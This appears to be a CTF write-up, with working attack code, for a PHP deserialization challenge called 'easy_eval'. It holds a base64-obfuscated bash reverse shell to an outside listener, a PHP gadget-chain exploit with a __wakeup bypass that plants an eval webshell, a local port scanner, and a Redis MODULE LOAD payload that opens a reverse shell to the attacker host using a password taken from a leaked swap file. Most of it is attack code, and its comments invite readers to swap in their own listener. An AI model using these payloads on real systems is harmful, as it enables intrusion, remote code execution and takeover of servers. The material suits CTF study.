jackson（原文 "jackjson"，应为 Jackson 反序列化相关的笔记）
有个 shiro（目标上存在 Apache Shiro）
# Reverse-shell one-liner. The {a,b} brace expansion avoids literal spaces,
# a trick typically used where the injection point filters whitespace.
# The base64 decodes to:
#   bash -i >& /dev/tcp/47.96.31.86/2333 0>&1
# 47.96.31.86:2333 is the author's listener -- replace with your own.
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}
easy_eval（原文 "esay_eval"）
exp
<?php
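class A{
    // Local copy of the target's class A, used only to generate the payload.
    // In the chain, B::__destruct() calls $this->a->a(); A has no a(), so
    // __call() fires and eval()s $this->code -- that is the RCE sink.
    // Fixed: the original value had a stray ']' ("eval($_POST['cmd']]);"),
    // which is a parse error inside eval() and never gives a shell.
    public $code = "eval(\$_POST['cmd']);";

    /**
     * Any call to an undefined method evaluates $this->code as PHP.
     *
     * @param string $method ignored
     * @param array  $args   ignored
     * @return mixed whatever the eval()'d code returns (null for empty code)
     */
    function __call($method,$args){
        eval($this->code);
    }

    /**
     * Runs on unserialize() and blanks the payload. The serialized object
     * therefore has to be crafted so that __wakeup() is skipped (e.g. the
     * property-count-mismatch trick, CVE-2016-7124 style) -- whether that
     * still works depends on the target's PHP version.
     */
    function __wakeup(){
        $this->code = "";
    }
}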
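class B{
    // Local copy of the target's class B. The property is declared so that
    // assigning it on PHP >= 8.2 raises no dynamic-property deprecation;
    // serialize() output is unchanged (a single public property "a").
    public $a;

    /**
     * Head of the gadget chain: calls a() on whatever is stored in $a.
     * With $a = A, a() is undefined on A, so A::__call() runs instead.
     * On the target the object built by unserialize() is discarded right
     * away (per the commented-out challenge source), so this fires at once.
     */
    function __destruct(){
        echo $this->a->a();
    }
}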
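// Build the chain B->a = A: when the target unserialize()s this and drops
// the object, B::__destruct() -> A::__call() -> eval($this->code).
$b = new B();
$b->a = new A();
$raw = serialize($b);
echo $raw, "\n";

// The target blanks A::$code in __wakeup() and rejects any "A"/"B" object
// whose declared property count is not 1. Lower-casing the class name slips
// past the case-sensitive character class (PHP resolves class names
// case-insensitively), and declaring 2 properties while supplying 1 makes
// unserialize() skip __wakeup() yet still leave a built object for
// __destruct(). Whether the skip still works depends on the target's PHP.
echo str_replace('O:1:"A":1:', 'O:1:"a":2:', $raw), "\n";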
//(challenge source kept for reference -- the filter the payload has to pass)
//if(isset($_REQUEST['poc'])){
// preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
// if (isset($ret[1])) {
// foreach ($ret[1] as $i) {
// if(intval($i)!==1){
// exit("you want to bypass wakeup ? no !");
// }
// }
// unserialize($_REQUEST['poc']);
// }
//
//
//}else{
// highlight_file(__FILE__);
//}
大小写绕正则：`[BA]` 区分大小写，而 PHP 类名不区分大小写，所以 `"a"` 不会被匹配到；同时声明 2 个属性却只给 1 个，使 unserialize() 跳过 __wakeup()，但 __destruct() 仍会执行（是否有效取决于目标 PHP 版本）。
O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:21:"@eval($_POST["cmd"]);";}}
需要绕 disable_functions：eval() 能执行，但命令执行函数被禁用，shell 要从别的途径拿（下面利用本机的 Redis）。
.config.php.swp — 泄露的 vim 交换文件，用 `vim -r .config.php.swp`（或 `strings`）恢复；后面用到的 Redis 密码应当来自这里。
\
可以发现有个 redis 服务，扫端口：从 webshell 里用下面的 bind 扫描确定它监听在哪个端口。
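?><?php
// Bind-scan for local listeners: try to bind every TCP port on 0.0.0.0;
// a bind that fails with "Address already in use" means a service holds it.
// Caveats: as an unprivileged web user, ports below 1024 fail with
// "Permission denied" instead, so they show up as closed; and each
// successful bind briefly grabs the port, so release it right away.
// Fixed: port 65535 was skipped (loop ran to 65534) and successful binds
// were never closed explicitly.
for ($port = 1; $port <= 65535; $port++) {
    $srv = @stream_socket_server("tcp://0.0.0.0:" . $port, $errno, $errstr);
    if ($srv === false) {
        // substring match: the exact wording can carry extra detail
        if (strpos($errstr, 'Address already in use') !== false) {
            var_dump($port);
        }
        continue;
    }
    fclose($srv); // release the port we just bound
}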
6379（Redis 默认端口）被报告为已占用。
/tmp 目录可以上传：/tmp 可写，把编译好的 Redis 模块（exp.so）传到这里供 MODULE LOAD 使用。
<?php
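/**
 * Send a raw payload to host:port and return everything the peer writes
 * back until it closes the connection (or reading times out).
 *
 * Despite the name (and the commented-out HTTP framing), $link is sent
 * verbatim -- here it carries Redis inline commands.
 *
 * @param string     $host target host
 * @param int|string $port target port (cast with intval)
 * @param string     $link raw bytes to send
 * @return string|null response, or null when the connection fails
 */
function Getfile($host, $port, $link){
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if(!$fp){
        echo "$errstr (error number $errno) \n";
        return null;
    }
    // Bound the read loop: a peer that never closes the socket (payload
    // without "quit") would otherwise hang the request indefinitely.
    stream_set_timeout($fp, 30);
    fwrite($fp, $link);
    // fixed: was initialised as $content but appended to as $contents
    $contents = '';
    while(!feof($fp)){
        $chunk = fgets($fp, 1024);
        if ($chunk === false) {
            break; // read error or timeout -- feof() would never turn true
        }
        $contents .= $chunk;
    }
    fclose($fp);
    return $contents;
}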
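// Redis inline-protocol payload, pushed over a raw socket from the webshell
// (Redis is reached via 127.0.0.1, i.e. only from the box itself).
$redis_pass  = "you_cannot_guess_it"; // presumably from the leaked .config.php.swp
$module_path = "/tmp/exp.so";         // module uploaded to /tmp beforehand
$lhost       = "47.96.31.86";         // attacker listener -- replace with yours
$lport       = "2333";

$poc  = "AUTH {$redis_pass}\r\n";
// MODULE LOAD needs a module built for the target's architecture, and newer
// Redis builds may refuse it unless enable-module-command is set.
// system.rev must be a command exported by the module you loaded -- confirm
// against the module you actually compiled.
$poc .= "module load {$module_path}\r\nsystem.rev {$lhost} {$lport}\r\n";
// info yields a readable reply to verify the exchange; quit makes the server
// close the socket so Getfile()'s read loop terminates.
$poc .= "info\r\nquit\r\n";
var_dump($poc);
var_dump(Getfile("127.0.0.1","6379",$poc));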